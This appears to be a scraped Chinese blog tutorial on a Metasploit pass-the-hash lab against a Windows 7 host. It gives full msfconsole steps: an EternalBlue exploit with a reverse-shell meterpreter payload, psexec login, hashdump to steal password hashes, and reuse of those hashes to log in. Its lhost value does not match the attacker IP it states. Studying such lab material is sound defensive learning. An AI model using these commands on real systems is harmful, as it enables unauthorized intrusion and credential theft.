2. 程式人生 > >Metasploit之Hash值傳遞滲透

Metasploit之Hash值傳遞滲透

阿新 發佈:2018-12-10

講述Metasploit獲取到hash值的滲透測試。

測試環境

目標機:

Windows 7 Ultimate
192.168.1.9

攻擊機:

Linux 4.6.0-kali1-amd64 
192.168.1.31

攻擊機姿勢(永恆之藍):

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.1.9
set payload  windows/meterpreter/reverse_tcp 
set lhost 192.168.1.12
exploit
獲得shell

Metasploit之Hash值傳遞滲透

進入metasploit環境下進行操作

use exploit/windows/smb/psexec    -->使用這個滲透攻擊模組

show options                      -->檢視配置選項

set RHOST 192.168.1.9         -->設定攻擊目標192.168.1.9  ,埠預設445

set SMBUser tdcoming               -->設定賬號為 tdcoming

exploit                           -->執行攻擊


成功後獲得meterpreter的反彈連線

hashdump              -->獲取hash值

使用hash值登陸

exit                  -->從meterpreter的反彈連線中返回到“msf exploit(psexec)>”

set smbpass hash值    -->設定hash值

exploit               -->再次登陸一遍

相關推薦

MetasploitHash傳遞滲透

講述Metasploit獲取到hash值的滲透測試。 測試環境 目標機: Windows 7 Ultimate 192.168.1.9 攻擊機: Linux 4.6.0-kali1-amd64 192.168.1.31 攻擊機姿勢(永恆之

程序設計基石與實踐系列傳遞還是按引用

有趣 name align pos str 堆棧 技術分享 easy pan 從簡單的樣例開始.如果我們要交換兩個整形變量的值,在C/C++中怎麽做呢?我們來看多種方式,哪種能夠做到.void call_by_ref(int &p,int &q) { //

C#傳遞和引用傳遞

       常用的值型別有:int double char bool decimal struct enum;常用的引用型別有:string 陣列 自定義類 介面 委託;值型別的值儲存在記憶體的棧上,引用型別的值儲存在堆中,棧上儲存資料的效率要高於堆。所謂值傳遞:把值型別作

java參數傳遞傳遞

自定義類型 hello 傳遞方式 bsp 我們 n) %20 images color 一 概述 1.什麽是參數傳遞? 調用方法時向形參傳遞數據的過程叫做參數傳遞。在編程語言中有兩種傳遞方式:值傳遞與引用傳遞。必須強調的是,這裏提到的兩種傳遞方式不是僅限於java使用到

go系列傳遞、引用傳遞與指針傳遞

參考 lse make mod s/4 object 引用類型 obj 值傳遞 1、關於值傳遞、引用傳遞與指針傳遞 當一個變量或者新值被創建時, 如果沒有為其明確指定初始值,go語言會自動初始化其值為此類型對應的零值, 各類型零值如下: false : bo

JS基礎傳參(傳遞、對象傳遞

rate ati 無效 over 並不是 undefined 字符 https cal 一、概念   我們需了解什麽是按值傳遞(call by value),什麽是按引用傳遞(call by reference)。在計算機科學裏,這個部分叫求值策略(Evaluation

Metasploit滲透安卓實戰

Metasploit之滲透安卓實戰 在之前的Metaspoloit使用中都是在Windows系統中,因為滲透的是Windows系統,所以選用了“windows/meterpreter/reverse_tcp”模組。而這裡需要滲透安卓系統了,就選用“android/meterpreter/reverse_tc

九、java基礎引數傳遞傳遞

一、值傳遞/*程式在執行過程中,引數傳遞問題: 1.傳遞資料是基本資料型別 2.傳遞資料是引用資料型別 */1.以下程式是傳遞基本資料型別 public class ClassTest04 { public static void m1(int i){ i++;

九、java基礎參數傳遞傳遞

oid 值傳遞 [] 問題 數據 sta out 執行過程 入口 一、值傳遞/*程序在執行過程中,參數傳遞問題: 1.傳遞數據是基本數據類型 2.傳遞數據是引用數據類型 */1.以下程序是傳遞基本數據類型 public class ClassTest04 {

Java基礎傳遞,引用傳遞

值傳遞 8種基礎型別是值傳遞。 傳遞的是副本,方法裡的引數被修改不影響原資料。 引用傳遞 類,介面,陣列是引用傳遞。 傳遞的是物件所在的記憶體地址,將記憶體地址拷貝一份,然後作為值傳遞給引數。 引用物件的實際內容可以被改變,但是引用物件的地址不會改變(因為記憶體地址

實戰Metasploit安卓滲透舍友

文中提及的部分技術可能帶有一定攻擊性,僅供安全學習和教學用途,禁止非法使用 安卓手機在移動端佔有很高的比重,今天就帶領大家一塊利用Metasploit進行一次滲透之旅,安卓滲透和windows其實差不多的,好啦,不廢話了,正題開始。 環境:kali linux 2016.

Python學習函式引數傳遞:傳 or 引用 ?

在學完Python函式那一章節時,很自然的的就會想到Python中函式傳參時傳值呢?還是傳引用?或者都不是? 我回去看了看我以前做的關於淺拷貝與深拷貝的筆記,其實那裡也已經涉及了一些引用相關的問題了。不過在這裡還是再進行一次總結吧。 在回答上面的問題之前我們先

PHP傳遞與引用傳遞

廢話不多說,直接上程式碼(值傳遞與引用傳遞的區別我在這就不介紹了,不懂得的小夥伴直接程式碼理解,還是不懂 -> 自行度娘): 普通變數: 值傳遞 <?php $a = 6; ec

java 方法呼叫 方法傳參 傳遞還是引用傳遞位元組碼

/*Java中的引數傳遞方式到底是引用傳遞還是值傳遞?java核心技術卷I裡有一個結 論我覺得挺有意思的:java中沒有引用傳遞,只有值傳遞 首先看定義: 值傳遞,是指方法接收的是呼叫者提供的值 引用傳遞,是指方法接收的是呼叫者提供的變數地址 事實上,Java中方法引

微信小程序頁面之間傳遞

數據 sets .html 存儲 target itl 頁面 program blank 頁面之間傳值有三種方式 1、url傳值 2、本地存儲傳值 3、全局變量傳值 1.url傳值: 通過url傳值的需要通過option來獲取參數值。 更多詳情可以訪問小程序

關於Java 拷貝數組方法 Arrays.copyOf() 是地址傳遞還是傳遞

clone images java 地址 tput mage alt 元素 color 基本元素為對象時,淺拷貝,拷貝引用(ArrayList 的clone()調用Arrays.copyof(),官方文檔註明為淺拷貝) class A{ int

redis數據類型四hash的指令操作(五種數據類型中最重要的一種)

redis數據類型 hash的指令操作 1、老規矩,看看redis官方文檔怎麽寫: 這裏說呢,hashes 這種數據類型容易代表對象,實際上你可以無限制地在 hash 中放給定數量的字段。(除了可用的內存)(其實這個我理解有些模糊,是內存能夠滿足就可以無限制的放入嗎?)所

《opencv學習》

http input namespace turn 實現 ble 技術 jpg row 主要講解OTSU算法實現圖像二值化:      1.統計灰度級圖像中每個像素值的個數。     2.計算第一步個數占整個圖像的比例。     3.計算每個閾值[0-255]條件下,

C++函數的三種傳遞方式為:傳遞、指針傳遞和引用傳遞

否則 方式 指針 指向 out 數據結構 logs 形參 使用 C++函數的三種傳遞方式為:值傳遞、指針傳遞和引用傳遞 值傳遞: void fun(int x){ x += 5; //修改的只是y在棧中copy x,x只是y的一個副本,在內存中重新開辟的一塊臨時空間把y

傳遞和引用傳遞

如何 nth value 引用 static st2 值傳遞 pack 修改方法 在java中如何修改方法參數的值 答案是 package myapp; import org.omg.CORBA.IntHolder; public class Test2 { pu